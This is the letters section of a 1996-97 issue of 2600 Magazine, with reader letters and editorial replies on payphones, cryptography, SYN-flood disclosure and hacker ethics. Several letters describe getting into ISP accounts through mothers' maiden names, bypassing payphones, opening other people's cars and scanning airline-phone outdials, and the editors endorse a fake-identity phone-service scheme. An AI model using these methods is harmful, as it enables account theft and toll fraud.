I read somewhere that there are some payphones that have a 2400 modem in 
them. If the phone rings ten times, the modem will answer letting the caller dial out 
or perform other useful operations. Is this possible, or just another pile of shit? By 
the way, is there a method or whatnot for connecting to a Windows 3.x or 95 run 
machine? That could be very useful. Someone should write an article. 

Yosemite Sam 
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Indeed someone should. You can bet that there are 
payphones of many varieties that answer in all different 
modes allowing all kinds of functions to be performed 
by those in the know. 


Encryption 


Dear 2600: 

On the inside cover of your mag, there is a pgp en- 
coded message. Please post or send the key. I realize the 
message was probably meant to be decoded by a brute 
force crack, but as cryptology is not my thing, I would 
appreciate it. 

Data Stream 

That's not a message, its our PGP public key which 
allows you to send us messages that only we can read. 
Theoretically anyway. 


Dear 2600: 

I’ve read your magazine for quite some time and 
very much enjoyed the spring issue, so I was especially 
dismayed to read the summer issue. I don’t know what 
led you to print the two articles, “Secret Codes” and 
“How to Create Encryption”. The former was just poor 
taste, but the latter was irresponsible journalism. 

The information in “Secret Codes” is the sort of 
material that I would expect to find in a children’s book 
and is suitable for passing notes in class. It’s not what I'd 
expect to find in the premiere hacker quarterly. However, 
the program that Mister Galaxy wrote could be handy 
for sending messages to your friends on BBS’s if you’re 
afraid that the sysop snoops through people’s e-mail. 

On the other hand, “How to Create Encryption” was 
the biggest load of bullocks that I’ve ever had the mis- 
fortune to read in my life. If TheCrow were trying to pro- 
vide a very basic introduction to cryptography in order to 
get people interested and maybe explore it a bit, his arti- 
cle would have been bad, but not negligent. However in 
his first paragraph, he states that the purpose of the arti- 
cle is to keep people like the Secret Service from reading 
your data. Anyone who thinks that reading this article 
and applying the sketchy information provided will keep 
the Feds from accessing their data is very misled. 

Further, the article was not researched in the slight- 
est. I'd like to see a reference for TheCrow’s assertion 
that “brute force [is] impossible as long as your key is 8 
characters long or so”. Wouldn’t that be nice if it were 
true! Also, he states that “whatever formula you choose 
to use is resulting in completely random encrypted val- 
ues”. If the values were completely random, then you 
wouldn’t have any way of retrieving them again. The 
values should appear totally random. This may seem nit- 
picky, but people shouldn’t feel that they can introduce a 
random number generator into their formula and then 
wonder why they can’t retrieve their plaintext again. 

Some of the points that he makes are valid, like 
checking for patterns in the cyphertext and making sure 
that your plaintext doesn’t have distinguishing features 
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which will undermine your encryption algorithm, and 
then he says something completely boneheaded like, 
“the big name encryption products of today use formu- 
las that are very hard to do backwards (factoring large 
prime numbers). This is effective, but it’s slow.... If you 
choose you can figure out your own algorithm...” 

Reader: “Well, damn, I'd really like to keep the 
NSA from digging through my data, but I don’t want to 
wait for something that uses large primes. True, it’s se- 
cure, but it’s also slow. I know... I’ll figure out my own 
algorithm! And II] make sure that it’s really hard to take 
the reciprocal of!” 

TheCrow then goes on to cheerfully ignore delving 
into any detail about an algorithm, as if, having hand- 
waved over the large prime issue, the rest is trivial. 
Since large primes are out of the picture (since TheCrow 
isn’t that good at math) there are some other tricks he 
enjoins the reader to try. Unfortunately, they are just that 
- tricks. And now having published them, even provided 
this methodology was secure, they are no longer viable. 
Or does he think that the sort of person who he worries 
about cracking his data doesn’t read 2600. If I ever de- 
cided that I wanted to see what was on TheCrow’s hard 
drive I’d decrypt the last few bytes of his file and tack 
that onto the key and decrypt the rest. Oh, wait. I forgot 
that the key was more than eight characters. I'll never be 
able to crack that. Never mind. 

The crowning glory is TheCrow’s offer to give the 
executable version of his program out for free while re- 
taining the source code. It is an accepted practice in the 
field of cryptography to release your algorithm, because 
if it is secure, even if the enemy knows it, it won’t help. 
The only time when you wouldn’t want to make the al- 
gorithm known is if it is a) insecure or b) has a trap door. 
Besides, why would TheCrow want to keep the code a 
secret when he’s spelled it all out in loving detail for us? 

I am very disappointed that 2600 saw fit to print this 
pile of shit. If I saw this posted on a BBS somewhere, or 
on some yob’s home page then I would be inclined not 
to take it very seriously. However, by attaching the con- 
siderable reputation of 2600 to it, you’ve validated the 
message that strong cryptography is easy and if you tin- 
ker around a bit, you’ll be able to come up with some- 
thing that will withstand any attack in the world. I 
applaud your effort to print information on cryptogra- 
phy since I think that it is crucial that people have the 
knowledge which will, on one hand, allow them to pro- 
tect their data from prying, and on the other hand, allow 
them to keep the government from legislating away our 
crypto-rights. However, publishing a two-page spread 
by somebody who dismisses strong public-key systems 
as “not very convenient” is irresponsible and tells me 
that either there isn’t much editorial control there, or 
you’re desperate for submissions. If it’s the former, I 
don’t expect that you will outlast the demise of your 
reputation. If the latter, let me know, and I’ll write you 
an article on secure voice transmission through the use 
of pig-latin. 
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Incidentally, if I were to be given two pages to try to 
educate people on cryptography, I would tell them to 
read Codebreakers, Applied Cryptography, the sci.crypt 
FAQ, subscribe to the cypherpunks and codepunks 
mailing lists to start with and not to write their own en- 
cryption systems unless their names are Phil Zimmer- 
man or Whitfield Diffie. 

Azazel 

It’s not always possible for us to print the most de- 


finitive word on a subject. It's nearly impossible for us to 


print an article that is 100% correct, no matter how well 
written. With this in mind, we take the best of what has 
been made available to us on a topic and hope that it 
generates interest, letters, and corrections, not to men- 
tion future articles. That may very well happen in this 
case. 


Dear 2600: 

What is used to encrypt your box files? I’m not 
AOL scum - please don’t respond to this letter with a 
witty retort. Thank you. 

Anonymous 

Only an AOL person would fear a witty retort. That 
said, we can assume you're referring to files on our web 
site (www.2600.com), which are not encrypted at all 
since people wouldnt be able to read them. Many files 
are compressed using a program known as gzip. Most 
any system on the net should allow you to gunzip such 
files, which typically have an extension of .gz. 


Dear 2600: 

Just finished reading TheCrow’s article. He can save 
himself some trouble by using IDEA, in the conven- 
tional encryption mode of PGP. I am also wondering 
why he seems reluctant to release source code. Cypher- 
punk suspicion dictates looking at that before trusting 
any new algorithm. IDEA and 3DES have source avail- 
able publicly and, while I am personally unqualified to 
do the math of checking them, I trust those who have 
done so. I think it’s a good idea to assume an attacker 
has your algorithm and source code. Single DES is very 
bad - banks still use it but it’s only 56 bit and so can be 
bruted by the NSA or anyone with $10 million or so, 
from what I hear. Don’t take all this wrong, I am in favor 
of you writing encryption stuff. The more out there, the 
better for everyone. 

A good, simple test for randomness and repeating 
patterns is to pkzip the encrypted and random-looking 
file. If it shrinks a lot, it is not very random. There are 
others out there as well, but I have never tried them. I 
would strongly suggest not trusting the human eye for 
this task, and just about everyone has pkzip. Good 
sources of randomness are rare. Radioactive decay is 
one, but a lot of stuff that /ooks random to the human 
eye is not really and truly random. These and other 
points are covered very well in PGPdocs | & 2 and Ap- 
plied Cryptography, which are good reading for anyone 
interested in the subject. Commenting on bigmother’s 
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hatred of crypto, John Von Neumann once said, “Any- 
one who considers arithmetical methods of producing 
random digits is, of course, in a state of sin.” Keep on 
sinning. 

WinSocker 


Questions 


Dear 2600: 

I have a question regarding frog’s article “Imagi- 
nary Friends” on scamming ma bel! with a fake identity. 
OK, so you provided the phone company with all that 
fake info. Don’t they need your real address to give you 
phone service? 

thedespised 

Yes, but the reason for doing it like this is so that 
your imaginary friend begins to turn into a real person. 
He just happens to be living in your house for now. And 
the flip side is that if the phone service is in his name, it 
isn't in yours. 


Dear 2600: 

I have already bought your t-shirts, subscribed to the 
magazine off and on for the last few years, and bought it 
on the stands when not subscribed. But what I was won- 
dering is if ya all planned to come out with a 2600 base- 
ball cap. I personally think you would sell a good 
number of them. I would like to buy one. A black one 
with the 2600 graphic that you put on all the T-shirts. 

Merlin 
Anchorage, AK 

We've toyed with the idea of a rave cap but we just 
haven t gotten our act together yet on that one. We re not 
exactly at the PBS level of marketing and with luck we 
never will be. But the cap remains a possibility. 


Holes 


Dear 2600: 

This may not come as a surprise, but a lot of ISP’s 
are very insecure. They may have their passwords shad- 
owed and all their exploits plugged, but they may be 
missing a very important hole. Recently, when I 
switched ISP’s, I realized something very cool. While I 
was telling them my info, they asked me for my 
mother’s maiden name and said that it would be my “se- 
cret word”. | thought to myself, “Hey, I could do some 
hardcore social engineering here!” I decided to test my 
theory out. First I called up the ISP, then I went to cus- 
tomer service, then I told the operator that I forgot my 
password, but I had my secret word. They then told me 
the real password to the account. Of course it’s not as 
good as some other methods, but it works. I know a 
bunch of my friend’s mother’s maiden names so | got 
some of their accounts. I wasn’t an asshole about it - I 
told them that I knew and they were very surprised. To 
all of you in the world of dial-in Internet access, | 
strongly suggest changing your “secret word” if your 
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ISP uses one. I have gotten three accounts from mind- 

spring on this method, and two from local providers. I 
just wanted to warn and tell everybody! 

charr 

Atlanta 

ISP's aren't the only ones vulnerable in this manner. 

Many credit card companies ask for your mother’s 

maiden name as a password. lts a remarkably dumb 

way of authenticating someone 5 identity when you give 

it even a small amount of thought. 


On Cluelessness 


Dear 2600: 

I just read the last issue (Volume 13, Number 3) and 
was wondering: has the hacker mentality gone this low?! 
Cesar, Rev. Doktor S-Bo, and mthed should get a fucking 
clue and stop jumping to conclusions. I looked at the 
cover and laughed my fool head off (there is a red line 
surrounding the perimeter of the cover, thus making a red 
box). I really hope that the majority of the people reading 
this magazine got that or else we are in real trouble. 

Zyklon B 


Observations 


Dear 2600: 

Having telephone service ten yards from the CO, I 
discovered that the metal around the push-button on the 
tap alert heats up to an unbearable temperature, but it 
hasn’t failed. It just gets damn hot due to such a low re- 
sistance in the line, yielding a much higher current. Just 
an interesting piece of information I discovered. 

Dr. Delam 


Dear 2600: 

In response to “The Truth Revealed” from narrow 
minded fear bitters such as The Propagandist and I.M. 
Free: I’m an old phone phreaker who no longer has the 
time required to stay abreast of the “hacker skills”, but 
reading 2600 gives me comfort that Big Brother still has 
checks and balances. Some of us say “never again” to 
the likes of Hitler and if the government is taken over by 
evil, hackers will be indispensable friends fighting for 
our freedom. 

xphreak 


Dear 2600: 

1) An interesting sidelight to the markings on the 
road that Mr iNSaNiTY complained about and that were 
explained in the Autumn issue is that in certain areas of 
San Francisco these markings are actually in Chinese! I 
guess there must be a requirement - at least in San Fran- 
cisco - that the markings must be understandable to the 
local residents. 

2) Steve Rives’ article about mouse-oriented pass- 
words led me to think of a couple of other ways it could 
work. For example, one could be presented with a list of 


letters A-Z and numbers 0-9, and simply click on the 
letters/numbers that make up the password. While this 
would get around key stealers it still would leave one 
vulnerable to shoulder surfers. Or a password could be 
made up solely of left and right mouse clicks. Either 
way, it’s a novel idea with the age old password. 

3) I have to disagree with DayEight that a good 
motive for hacking your school’s computers is to change 
grades and schedules. Call me old fashioned, but I think 
one should have to work for one’s grades. I know high 
school sucks right now (it sucked for me) but sooner or 
later you’ll be glad you have that diploma. 

4) Reading Derneval’s article about the Brazilian 
phone system actually made me proud to be an Ameri- 
can! (And that’s no easy task, either!) Even with the 
1950’s phone wire pairs in the box downstairs that I still 
haven’t figured out yet, I’m better off than many people 
elsewhere in the world. 

5) I estimate that you probably spend about $2-$3 
on postage for each magazine you send out to sub- 
scribers. Figuring that in, the subscription price of $21 a 
year is fair. 

6) How can I help Ed Cummings? He’s sure been 


through hell and back. 
7) I loved the payphone graveyard on the cover. 
Desaparecido 
Sacramento 


Right now the best way to help Ed is to not forget 
the hell hes been through and to do everything we can 
to keep it from happening to anyone else. Full details 
are on our web site (www.2600.com) and you can write 
to Ed at bernies@2600.com.) 


Dear 2600: 

I just wanted to inform you that you’ve got wrong 
guy. I am talking about Phiber Optik. He doesn’t de- 
serve that name. I am the true Phiber Optik. I thought of 
the name and asked someone on IRC if they liked it. He 
must have seen. You are a big fake! All that stuff in your 
“MOD” book was bull. You can’t do any of that crap you 
did in the book. I can, so watch it you fake. I want my 
name back, and your gonna give it to me. Or else, and 
you can try to do anything to me cause ] know your a 
fake, and I’m gonna tell the world. I am elite. Your 
knowledge of computers is a speck of dirt compared to 
mine. Don’t get me wrong 2600 is ok but you guys are 
kindof dumb. Your mag is full of crap. Anyone who has 
anything to do with 2600 is a geek. Even if your dumb 
enough to read it. 

Heres my info I am sure you are bull so try to con- 
vince me losers. 

NG 
New Jersey 

You're either a real cocky ninth grader or the guy 
whose name, address, phone number, and school you 
posted is a ninth grader you've had a falling out with. 
Either way we will investigate your claim and an ad- 


juster will be in touch soon. 


Page 34 2600 Magazine Winter 1996-97 





Dear 2600: 

If you haven’t heard recently, there is a completely 
free service called Webring that offers rings to people to 
hook pages together of their tastes (everything from 
hacking to Star Wars to Egyptology). There is also a 
company called RING!Online, a Michigan-based ISP 
that decided that the Webring was a violation of their 
copyright status and is deciding to sue the Webring. The 
RING!Online has no ground for a copyright suit, in my 
opinion, but because they’ve got the money and We- 
bring is free, they are continuing with their lawsuit. | 
was wondering if someone over there at 2600 could help 
the Webring out. The URL for the Save the Webring is: 

http://ikx.org/~ZeroOne/savethewebring/ring.html 

Ammon 


Dear 2600: 

It was with great interest in Dr. Kolos’ article that 
prompted me to buy my first ish of 2600. I was recently 
touring Bosnia with CCIFOR (Canadian contingent) in 
May of 96. I shot over a thousand images and conducted 
several interviews both in Bosnia and Serbia. Oh yeah, 
and I drank vast quantities of Sliwowitz, a rather hard- 
core brandy. I am new to netting, as of Friday the 13th, a 
rather auspicious day to start researching my favorite 
topics such as censorship, accessibility, and communi- 
cations. The former all the more important when dis- 
cussing the former Yugoslavia. IFOR is a shitcan when 
it comes to PR gladhanding. I know. Attend one press 
conference and it’s quite apparent. Sometimes your mag 
loses me but with diligence and lots of homemade wine 
I hope to fully embrace this brave new world and learn 
from the gurus who do exist for the facilitation of info. 
Keep it up dudes! Canadians love this stuff! 

Rosey 

As hackers, its easy to forget how inspirational the 
things we're involved in can be to people around the 
world. Thanks for reminding us. 


Dear 2600: 

For more on micropower (“don’t call it pirate”) ra- 
dio, check the Radio Resistor 5 Bulletin at http://www. 
hear.com/rw/feature/rrb.html. Also, if you’re near a 
Fry’s Electronics (kind of an overgrown Radio Shaft 
with a junk food aisle), they sell little 5-watt stereo FM 
transmitter kits real cheap. 

president@whorehouse.gov 


Dear 2600: 

What a big deal about underground stuff in the Au- 
tumn issue! Here is what we use in California and 
Nevada: red (electric), orange (communication, CATV), 
green (sewer), pink (temporary survey markings), yel- 
low (gas, oil, steam), blue (water), purple (reclaimed 
water), and white (proposed excavation). The number to 
call “before you dig” is 1-800-227-2600! 


New Stuff 


Dear 2600: 

I have recently come across an interesting adver- 
tisement. Via cell phone, a cop can track (GPS), shut 
down, and lock the doors to a car. Hmmm.... sounds like 
a phun hack. It is similar to the new Lincoln’s, where 
some Ford techy can, through a phone, track down (via 
GPS) a customer’s car, diagnose, and contact a towing 
firm. Now, I’m all for personal security, but me thinks 
this is getting a bit carried away, but leaves room for 
some nice hacks. 

xorsystm 

There are tests underway that will allow cops to 
turn off the engine of a car involved in a chase. The 
whole concept of a speed trap is about to change forever. 


Dear 2600: 

You may have noticed that in newer models of cars, 
many come with remote control unlock/lock transmit- 
ters. They do a variety of things - the Mercury minivans 
can even be started remotely. Now, since there are only a 
certain number of frequencies, some will overlap or 
share. I have noticed that with my remote I can walk 
down the rows of cars at malls or other parking lots and 
open a car every so often by continuously clicking on 
the button. So far, I have had the best luck with Dodge 
cars and trucks. 

TheFetish To Heresy 


Numbers 


Dear 2600: 

I was going to dial my mom at work, so | dialed (or 
thought I dialed) 349 and suddenly I got this speak and 
say voice saying “press 1 for coin test, press 2 for coin 
relay test, press 8 for ring test, press 9 for second party 
ring test”. I played with this for awhile, mostly just get- 
ting weird noises or silence. The choices went all the 
way up to 18, with choice 19 being further assistance 
and I didn’t want to run into a smiling and ever-so-gra- 
cious Ma Bell employee. I tried many times to repeat 
this fun little game but to no avail. What was it and what 
can I do with it? My area code is 708 if that makes any 
difference. 

sisifis 

You can't do anything until you find the number 
again. After you do that you'll be able to have all kinds 
of fun making your phone ring, testing red boxes, and 
hearing funny tones. We expect a full report. 


Dear 2600: 

In the 540 area code you can get ANAC by simply 
dialing 811. This works from any phone (fortress or 
not). I’m not sure if this works in any other area codes or 


CF | not. Secondly, close inspection of some of the fortress 
Alameda, CA | fones in my area revealed a surprise. Up underneath the 
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bottom of the outer box (the blue case) I found a modu- 
lar phone plug! I assumed it was a test plug for the telco 
techs since you could plug a normal handset into it and 
make calls like you were on a standard line - totally by- 
passing the fortress fone’s asking for money. One last 
thing. I was at a local company and overheard them say 
they were being plagued by prank calls. They tried the 
ever-popular *69 to call their pranksters back and kept 
getting a message saying their call couldn’t be com- 
pleted using that method. I told them that *67 blocks 
caller ID and possibly even *69. They told me their boss 
told them to do a *57 the next time. They were told that 
this was a way for the phone company to provide you 
with the number of the last person to call you. This 
method is supposed to take several months before you 
get an answer, but it is supposed to be able to trace back 
any number - even those who used *67 first. Is this true? 
If it is, isn’t that a blatant invasion of privacy (as if caller 
ID wasn’t)? 
Captain Video 
The ANAC number differs from region to region. 
The payphones you mention are obviously COCOTs 
that are manufactured by morons since a telco-operated 
payphone would ask for money no matter where on the 
line you clipped in. Perhaps these imbeciles thought 
that nobody would ever plug a phone into that phone 
plug. As for the *57 scam, yes, you can “trace” a num- 
ber in this fashion and the phone company can make a 
little money from your annoyance. Usually you have to 
use it many times before they will do anything at all. You 
can also contact the Annoyance Call Bureau of your lo- 
cal company who are required to track down persistent 
annoyance calls for free. These are really the only calls 
you should be concerned with anyway. 


Dear 2600: 

Pve seen the topic “What is the ringback number 
for my area?” But I’ve never seen any number for Ger- 
many, so I thought I would help you by sending the ring- 
back number of my area. The number is 117755, after 
which you dial your own number. For example, if your 
number is 123456, then you must dial: 117755-123456. 
This ringback number is only valid for Nuremberg (in 
Bavaria). Have phun! 

Michael 


Corporate Hacking 


Dear 2600: 

IBM has created a magazine ad in which they state 
that they have a group of “ethical hackers” as part of 
their SecureWay family of products and services. These 
hackers will attempt to “break into your system and re- 
veal the cracks in your armor”. Once they know their 
customer’s vulnerabilities, they will “erect multilayered 
firewalls” and install “special” IBM software. While the 
ad speaks against “14-year-old sociopaths” and “wily 
hackers”, it would seem that they are supporting “ethi- 
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cal hackers”. I am encouraged by IBM’s apparent posi- 
tion and I believe it is good for the H/P underground. 
This ad can be found in the October 1996 issue of Dis- 
cover magazine on pages 46 and 47. For a booklet on 
Secure Way, call 1-800-IBM-7080, ext. G204. 
Jack Stuart 
We hope IBM realizes that most of the “ethical 
hackers” out there don't work for IBM. 


A World of SYN 


Dear 2600: 

I have been reading 2600 casually for many years 
now, and in general I find it fascinating. However, I feel 
obligated to comment on the article describing SYN 
flooding in the Summer 96 issue. I’m fairly disap- 
pointed that the editors of 2600 would print such an un- 
enlightening and potentially abusable article, right 
down to the command line for the average peon cracker 
wannabe to type. While you may misinterpret this letter 
as a vain attempt on my part to have the editors of 2600 
censor articles, it’s not. Having articles that contain in- 
formation about well-known shortcomings in the 
TCP/IP protocol suite is not enlightening in the least to 
anyone who knows the protocols. Additionally, if 
knowledge really is power, and if you’re really trying to 
encourage your readers to understand these protocols 
instead of just typing your printed source code into their 
computers, you might suggest they read the TCP/IP Il- 
lustrated series. 

Providing source code removes any remaining ex- 
ploration and learning there might be. If someone can’t 
figure out how to use BSD sockets, perhaps they’re not 
ready to be reading 2600 yet. 

meem 

We understand the concern and even outrage that 
was voiced following the appearance of this article. 
However, we stand by this and future articles that point 
out major design flaws. You sav this was a well known 
problem. Keeping quiet about it obviously did little to- 
wards getting it fixed. By letting everyone in on it now, 
we may cause some short term problems but nothing 
compared to what would happen if the flaws remain un- 

fixed while the net continues to grow. 


Dear 2600: 

While I am a staunch advocate of freedom to speak 
and freedom on the Internet, it is the antics of people 
like you that are going to screw it up for everyone. I am 
referring to your dissemination of the method to cause 
“denial of service” by flooding ISPs. This technique has 
no redeeming virtue and can only be used to disrupt and 
destroy. Ironically, the target of an attack by the method 
you distributed, Panix, is an ISP that has generously 
provided free resources to groups that advocate freedom 
for the Internet. Are you now happy with the results of 
your thoughtless abuse of freedom? The government is 
itching to control and censor the Internet and while free- 





dom on the Internet enjoys wide support, a few more in- 
cidents like the ones you made possible can sour public 
support and invite the crackdown we all dread. Do you 
really want to aid every nutcase with a keyboard and a 
lust for power to work their will on the Internet commu- 
nity? This is not computer science and lore; it is vandal- 
ism. Think about what you have done. If you disagree 
with me, I would be interested in your rational. 
George 
The people at panix.com seem to understand why 
the article was published as well as the need to do some- 
thing about the problem. We agree it was most unfortu- 
nate that this of all systems was targeted but we feel the 
greater good was ultimately served by revealing the 


flaws. And we don't see this as a reason for more control 


and censorship, if anything, the quick and professional 
way this was dealt with on such systems shows us that 
we can take care of ourselves on the net without outside 
interference. 


Oops 


Dear 2600: 
From the response to a letter by s6killer, Volume 13, 


Number 2, page 31: “...All our issues are sent in en- 
velopes and the name of the magazine isn’t printed on 
the envelope...” 

The letters section of every issue of 2600 I can re- 
member has at least one letter from someone who’s 
afraid to subscribe for fear of parents/authorities finding 
out. Most of these letters are followed by a response 
from the editor similar to that above. 

So I’m a little concerned when my latest issue ar- 
rived in my PO Box in the normal yellow envelope, and 
the name and description of the magazine is printed 
clearly in the return address as follows: 

2600 Magazine 

“The Hacker Quarterly” 

PO Box 752 

Middle Island, NY 11953-0752 

Forwarding and Address Correction Requested 
Is there some miscommunication between your letters 
and subscription departments? If the return address has 
always appeared that way, I’ve never noticed it before, 
but I definitely notice it now. I personally couldn’t care 
less if people know I subscribe to 2600, but I know 
that’s not the case with all your other subscribers. 

Gordon 

Actually, you found an inconsistency with what 
we've been saying that has managed to escape us for 
years. While all current issues are sent in envelopes 
without the name of the magazine, back issues and t- 
shirts get a hand stamped return envelope that does 
have our name on it. (Sometimes new subscribers get 
their first issue in this manner as well.) This was defi- 
nitely an oversight on our part and we will immediately 
change the hand stamps so only the PO. box is shown. 
But we should warn subscribers not to let their sub- 


scriptions lapse since the reminder letter we send out 
comes in an envelope with our name on it. This isn't a 
ploy to keep our most paranoid subscribers for the rest 
of their lives; its just that we get those envelopes from 
the post office pre-stamped and that’s how they come. Of 
course, it could also be used as proof that you no longer 
subscribe.... 


More Flightlink Facts 


Dear 2600: 

The article “Flightlink Fun” (TDi) in the summer 
issue seems to not be very complete. First of all, the 
Flightlink system (In-Flight Phone Corp.) is not only in 
use by Continental Airlines, but also by US Air, Amer- 
ica West, and Carnival (the system is not widespread yet 
- a grand total of only 146 planes have been fitted). Be- 
sides the fact that I released much of this same informa- 
tion to alt.2600 early this year (circa January), this 
article lacks real data. It seems to gloss over the system, 
describing only the features. This is equivalent to writ- 
ing an article on “Hacking Pizza Hut” and describing 
only the edible items available to be bought. I would 
hope that your readers would want heartier info such as 
system hardware and OS specifications. I had begun re- 
searching the system, but stopped after deciding it 
wasn’t worth the effort. Nonetheless, I will provide the 


-information that I did obtain. 


For starters, the telephone system is unintelligent, 
meaning that it does not check for the proper format, 
number of digits (or lack thereof), etc. before placing 
your call. Each plane has four or eight outdials (depend- 
ing on the plane), and air-to-ground frequencies 
shouldn’t be too difficult to find (849-851/894-895 
MHz). I traced some ANIs at different points in flight, 
and acquired these numbers (outdials on the ground - 
not accessible from the ground): (301) 654-9894, (310) 
961-2800, (318) 631-2725, (318) 631-6187, (501) 536- 
9602, (501) 536-9759, (502) 361-0346, (502) 361-3544, 
(615) 399-8622, (615) 399-8634, (708) 716-6600, (713) 
820-3250, (713) 820-3420, and (713) 820-3453. Scan- 
ning in these NPA/exchanges could prove useful. 

I wasn’t able to glean much OS/hardware info di- 
rectly from IFPC, but was able to get a few hardware 
specs on my own. Each set of three terminals (each row 
on each side of the aisle) connects to a concentrator un- 
der the seats. This concentrator (IF-DA 1109-102-03 
REV. H1) accepts one each of a ribbon cable (90301/26 
REV B 400-4) for the monitor and a twisted-pair cable 
(12-6568 REV.2 27478) for both a handset and an RJ11 
6-position DataLink connection for each of the three 
terminals (ports J10, J12, and J14). In addition, it uses 
what appears to be two LAN connections (one of which 
appears to be a three-conductor twisted cable) as well as 
a link to a power source. The following are 3M hood 
model numbers on the connectors (while this may seem 
like useless data, the type of connector could possibly 
be determined from this): monitor ribbon cable - 10326, 
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handset twisted-pair cable - 10314, LAN cable #1 (port 
J3) - 10840, and LAN cable #2 (port J4) - 10336. While 
the concentrator does not seem to have any major pro- 
cessing capabilities, it does have a number of two-posi- 
tion switches, one of which is marked “TEST”. 
Checking the RJ1 1 DataLink port with a multimeter re- 
veals that it is indeed dead (01.4 mV DC) until valid 
plastic is inserted in the handset. 

In looking for the location of the IFPC, I found var- 
ious answers. Two possible locations I found are Oak- 
brook Terrace, IL (address unknown), and Charlotte, NC 
(5020 West Blvd., Charlotte, NC 28208-9775). Scanning 
the exchanges in these locations could prove profitable, 
and if you live nearby, you might want to go trashing. 

+universal cytixn+ 


Bernie S. Thoughts 


Dear 2600: 

I read the article on Ed Cummings with great inter- 
est (even went to your web site to get more information) 
and would like to put my two cents worth in. 

In your preface to the article (in the mag) you use a 
fairly strong tone to suggest that the whole incident is a 
fallacy of justice and should never have happened. I dis- 
agree with some of the rationale used in justifying your 
position on the situation. Reading your magazine and 
the information in it is not just for informational pur- 
poses. It is highly improbable that such innocence ex- 
ists. Instead it has to be assumed that someone will use 
the information for some purpose criminal or otherwise. 
This is true for Ed and his red boxes. I am not saying 
that Ed or anyone else is doing this for criminal reasons. 
But why develop these devices if there is no satisfaction 
in trying them? After all, would hacking be so much fun 
if you didn’t do it? 

I do think, though, that the added misperception of 
hackers, crackers, and the like as being malicious and 
criminal is far from true. I also believe that though there 
are people within our government and law enforcement 
who want Big Brother watching, that there are equally 
others who like yourselves are against those concepts 
and believe strongly in freedom. 

Freedom, though, is not without bounds. After all, 
freedom is merely a concept of our mind that has no tan- 
gible presence. It is the same theory behind currency. 
Our currency is no longer backed by some precious 
metal. Its strength lies solely in our belief that it has 
value. It is this concept that defines freedom. And 
though each person is allowed to interpret that freedom, 
we have to consider the whole and not the individual 
when trying to deal in Truth and Justice. 

I capitalize Truth and Justice because in philosophy 
there is talk of the absolute truth and justice by which all 
events can be viewed. This does not define good and 
bad, but allows for a method by which we can determine 
the rightness of an issue. 

This is where Ed was wronged. Law enforcement 


chose to view him with bias and therefore titled the 
scales. This in turn brought about the problem. Lastly, I 
hope Ed realizes that driving on suspension is bad and 
should not do it. And that all your readers exercise dis- 
cretion and not forget that reality is very harsh and that 
true justice doesn’t exist. I send my deepest condolences 
to Ed and hope his situation is resolved and that he can 
lead a regular life. 
Kevin 
The very concept that someone can be imprisoned 


for possessing information or technology should be 


enough to demonstrate that there are severe problems 
with our justice system and ultimately with our so- 
called democratic society. Do you propose to judge the 
intent of everyones words and possessions? Who will 
you trust to make this judgement? It's a very dangerous 
step that you seem willing to take. Everything from song 
lyrics to motion pictures to personal diaries to techno- 
logical toys can be seen as having only one evil purpose 
in the eves of someone somewhere. You may think it’s 
easy to judge intent as if it were an action but, in reality, 
such judgements are extremely difficult and dangerous. 


Our Hypocrisy 


Dear 2600: 

I chanced upon a copy of your magazine when a 
colleague brought it into work. While I doubt I will ever 
feel the need to purchase a copy, I feel a few words are 
in order on a couple of topics: 

1) Copyright. The free distribution of software to 
people who are unwilling to pay for it is illegal and im- 
moral. Of course, I know of very few computer users 
who have not done this at one time or another. The fact 
that “everyone does it” does not make it any less illegal 
and immoral. I’m not writing to condemn anyone for 
doing this, but I abhor your vain attempts to rationalize 
this illegal and immoral act as somehow good for soci- 
ety or the industry. This is juvenile and irresponsible. If 
you are engaged in an illegal and immoral activity, that’s 
between you, God, and law enforcement. But be adult 
about it. Don’t try to rationalize that the law is wrong, 
that what you are doing is somehow good, or that you 
somehow have a right to do what you’re doing. Recog- 
nize that what you are doing is wrong, whether you in- 
tend to continue or not, and take responsibility for your 
actions when you are caught. Software developers 
spend valuable time writing software. That software ob- 
viously has value, or you wouldn’t want it. Software de- 
velopers would like to eat, and their means of getting 
food to eat is through the money that honest people are 
willing to spend for their product. To make the argument 
that the large developers make enough, and that your 
petty thievery won’t hurt is to violate the principles of 
free enterprise. This implies a socialist mentality moti- 
vated towards the redistribution of wealth - the antithe- 
sis of the foundation our constitution is based on - a 
constitution that you seem willing to invoke selectively 
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through your advocacy of free speech and the rights of 
the accused. 

As a small-scale developer, every act of piracy 
against my software robs me of a significant part of po- 
tential profit. If this becomes too great, I will return to 
my day job and give up software development. Who will 
benefit from this? 

2) I support free speech and your right to print in- 
formation about how to write viruses. I think this is ex- 
tremely irresponsible, however. A virus is nothing more 
than a random act of vandalism. Why do you instruct 
people in how to construct such a thing? It serves no 
useful purpose and contributes to potentially millions of 
dollars worth of damage. It demonstrates a psycho- 
pathic disregard for the work and value of other people 
in society. I have a friend who was a writer. Literally 
thousands of hours of her work was once destroyed by a 
virus. Who knows how much money she may have 
made off the half-finished book? What was the point? 
People who develop viruses should simply be put up 
against the wall and shot out of hand, as unfit to cohabi- 
tate with other humans. 

I think if you run an article about how to construct a 
virus, you should run a counter article in the same issue 
about how to defeat that sort of virus. This sort of infor- 
mation point-counterpoint would be very useful and en- 
lightening. 

3) Your publication seems to take a cavalier attitude 
towards the concept of illegality when it suits you. No 
matter how you sugarcoat it, thievery is thievery. Bust- 
ing the code in an ATM is no less stealing from the bank 
as digging a tunnel under the vault or pointing a gun at a 
teller. 

4) You obviously have a cadre of very talented peo- 
ple. Too bad they can’t devote their efforts towards use- 
ful software that would enhance the ability of people to 
use their computers more efficiently. Why not forget 
about viruses and use your collective knowledge to 
write an operating system that beats the crap out of the 
Microsoft monopoly? Do something useful! 

Sean Emerson 
Goleta, CA 

You say you saw our magazine by examining a co- 
worker s copy. You should be made aware of the fact that 
not buying your own copy has resulted in your getting 
something from us without proper compensation. Or did 
you think that it was somehow different in your case, that 
its fine and dandy to pass our words all over the hemi- 
sphere but every time someone makes a copy of your 
code, they had better be writing you a check? Obviously 
there are differences (those of you who didnt get the red 
box cover - were being slightly sarcastic again), but 
you re oversimplifying what you see as a problem. No- 
body here supports software piracy of the sort where soft- 
ware is copied and sold for profit by someone else in 
much the same way as we don t support counterfeit CD's 
being sold to the public. But copying music, programs, 
and magazine articles leads to greater exposure for the 


artists, developers, and writers. If your product is not 
priced out of the reach of your intended audience, it will 
be in their interest to get an original copy. But in many 
cases this is not so and the only way people can even get 
a glimpse of what is being developed is by making 
